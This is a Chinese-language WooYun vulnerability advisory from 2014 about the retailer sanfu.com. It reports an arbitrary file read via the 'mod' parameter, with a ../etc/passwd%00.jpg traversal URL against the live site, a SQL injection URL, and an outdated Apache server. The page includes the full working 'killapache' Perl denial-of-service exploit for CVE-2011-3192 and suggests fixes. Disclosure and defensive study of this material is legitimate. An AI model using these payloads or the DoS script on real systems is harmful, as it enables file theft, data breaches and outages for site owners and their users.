当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058859

漏洞标题:三福百货任意文件读取漏洞

相关厂商:sanfu.com

漏洞作者: MyKings

提交时间:2014-04-29 12:00

修复时间:2014-06-13 12:01

公开时间:2014-06-13 12:01

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-29: 细节已通知厂商并且等待厂商处理中
2014-04-29: 厂商已经确认,细节仅向厂商公开
2014-05-09: 细节向核心白帽子及相关领域专家公开
2014-05-19: 细节向普通白帽子公开
2014-05-29: 细节向实习白帽子公开
2014-06-13: 细节向公众公开

简要描述:

1.mod参数过滤不严格,可读取/etc/passwd文件。
2.Apache版本过低,存在Dos攻击。
3.存在sql注入。

详细说明:

由于对mod参数过滤不严格,通过"../../../../../../../../../../etc/passwd%00.jpg"可以访问到/etc/passwd文件内容

00.jpg

01.jpg

02.jpg


sql注入:

14.jpg


Dos:CVE-2011-3192
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
没敢做Dos测试,这里贴出exp代码

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
# http://www.exploit-db.com/exploits/17696/
use IO::Socket;
use Parallel::ForkManager;
sub usage {
	print "Apache Remote Denial of Service (memory exhaustion)\n";
	print "by Kingcope\n";
	print "usage: perl killapache.pl <host> [numforks]\n";
	print "example: perl killapache.pl www.example.com 50\n";
}
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
	
$pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
	$p .= ",5-$k";
}
for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next; 	
	
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
$x = <$sock>;
if ($x =~ /Partial/) {
	print "host seems vuln\n";
	return 1;	
} else {
	return 0;	
}
}
if ($#ARGV < 0) {
	usage;
	exit;	
}
if ($#ARGV > 1) {
	$numforks = $ARGV[1];
} else {$numforks = 50;}
$v = testapache();
if ($v == 0) {
	print "Host does not seem vulnerable\n";
	exit;	
}
while(1) {
killapache();
}

漏洞证明:

1.http://www.sanfu.com/?mod=../../../../../../../../../../etc/passwd%00.jpg
2.http://www.sanfu.com/?class_new=0&do=index_new&mod=goods&orderby=is_hot&page=wooyun&per_page=32&price=-1&style=sale

修复方案:

1.严格过滤mod参数,过滤“.”、“/”字符。
2.升级Apache 2.2.20以上版本。
3.报了这么多肯定会有礼物吧:)

版权声明:转载请注明来源 MyKings@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-29 12:05

厂商回复:

感谢提交,修复中

最新状态:

暂无

漏洞评价:

评论